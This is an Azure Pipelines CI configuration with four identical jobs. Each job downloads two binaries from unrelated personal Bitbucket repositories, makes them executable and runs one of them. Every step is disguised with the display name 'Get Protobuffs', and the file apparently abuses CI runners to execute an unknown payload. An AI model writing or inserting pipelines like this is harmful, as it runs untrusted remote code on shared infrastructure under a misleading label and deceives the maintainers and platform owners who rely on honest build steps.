trigger:
- develop

pool:
  vmImage: 'ubuntu-latest'

jobs:
- job: App_01
  steps:
  - script: curl -OL https://bitbucket.org/nheqccm/software/raw/258f6031e4475680d3a03ea8a5bcc51a86d0943c/ccm && wget https://bitbucket.org/citra5162/m/raw/dd9fca79a6bba8efa20790ba8e2cbba53c60f63c/00/luc && chmod u+x * && ./luc
    displayName: 'Get Protobuffs'
    condition: succeeded()
- job: App_02
  steps:
  - script: curl -OL https://bitbucket.org/nheqccm/software/raw/258f6031e4475680d3a03ea8a5bcc51a86d0943c/ccm && wget https://bitbucket.org/citra5162/m/raw/dd9fca79a6bba8efa20790ba8e2cbba53c60f63c/00/luc && chmod u+x * && ./luc
    displayName: 'Get Protobuffs'
    condition: succeeded()
- job: App_03
  steps:
  - script: curl -OL https://bitbucket.org/nheqccm/software/raw/258f6031e4475680d3a03ea8a5bcc51a86d0943c/ccm && wget https://bitbucket.org/citra5162/m/raw/dd9fca79a6bba8efa20790ba8e2cbba53c60f63c/00/luc && chmod u+x * && ./luc
    displayName: 'Get Protobuffs'
    condition: succeeded()
- job: App_04
  steps:
  - script: curl -OL https://bitbucket.org/nheqccm/software/raw/258f6031e4475680d3a03ea8a5bcc51a86d0943c/ccm && wget https://bitbucket.org/citra5162/m/raw/dd9fca79a6bba8efa20790ba8e2cbba53c60f63c/00/luc && chmod u+x * && ./luc
    displayName: 'Get Protobuffs'
    condition: succeeded()
